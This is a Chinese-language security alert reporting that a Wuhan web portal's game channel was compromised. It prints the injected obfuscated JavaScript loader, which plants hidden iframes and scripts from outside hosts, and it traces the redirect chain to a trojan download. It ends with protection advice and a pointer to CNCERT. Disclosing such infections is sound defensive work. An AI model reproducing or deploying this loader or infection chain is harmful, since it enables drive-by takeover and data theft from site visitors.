注册
登录
| 关键词: hxxp html 200812 nbsp zhike juhui data iframe news com |
武汉热线游戏频道(hxxp://game.wuhan.net.cn/)被植入恶意代码。 用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。 MalUrl:hxxp://game.wuhan.net.cn/ 网页被嵌入恶意链接代码: if(document.cookie.indexOf(’hello’)==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie=’hello=Yes;path=/;expires=’+expires.toGMTString() eval(function(p,a,c,k,e,d){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,'g’),k[c]);return p}(’b.t(\’<q k=i r=f://4.8.5.3.n/h/6.7?1></q><g d=0 s=0 r=”f://m.v.9/e/j/2/a/l.o?1″></g><g d=0 s=0 r=”f://u.p.8/l.c?1″></g>\’)',62,32,’|123|200812|3322|360|97sewo|asd|aspx|cn|com|data|document|gif|height|html|hxxp|iframe|images|javascript|juhui|language|logo|news|org|png|qqxnm|script|src|width|writeln|www|zhike’.split(’|'),0,{}));} 挂马分析: 0 Root hxxp://game.wuhan.net.cn/ 1 script hxxp://game.wuhan.net.cn/game/include/dedeajax2.js 2 script hxxp://360.cn.97sewo.3322.org/images/asd.aspx?123 2 iframe hxxp://news.zhike.com/html/juhui/200812/data/logo.webp?123 3 anlyze hxxp://news.zhike.com/html/juhui/200812/data/logo.htm? 4 iframe hxxp://news.zhike.com/html/juhui/200812/data/aa.htm? 5 iframe hxxp://news.zhike.com/html/juhui/200812/data/wm/html/index.htm? 6 iframe hxxp://news.zhike.com/html/juhui/200812/data/wm/html/of.htm 6 script hxxp://news.zhike.com/html/juhui/200812/data/wm/html/var.js 6 script hxxp://news.zhike.com/html/juhui/200812/data/wm/html/tj.js 4 iframe hxxp://news.zhike.com/html/juhui/200812/data/bb.htm? 2 iframe hxxp://www.qqxnm.cn/logo.webp?123 最终下载病毒文件: hxxp://news.zhike.com/html/juhui/200812/data/wm/download.exe 通过执行以上病毒文件,来达到完全控制访问者的系统。 该网站历史挂马次数:3 Google对该网站的判定:安全 知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:hxxp://www.cert.org.cn/ 推荐的应对方法: 1.安装客户端保护软件。 2.检查更新windows及第三方软件补丁程序。 |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|
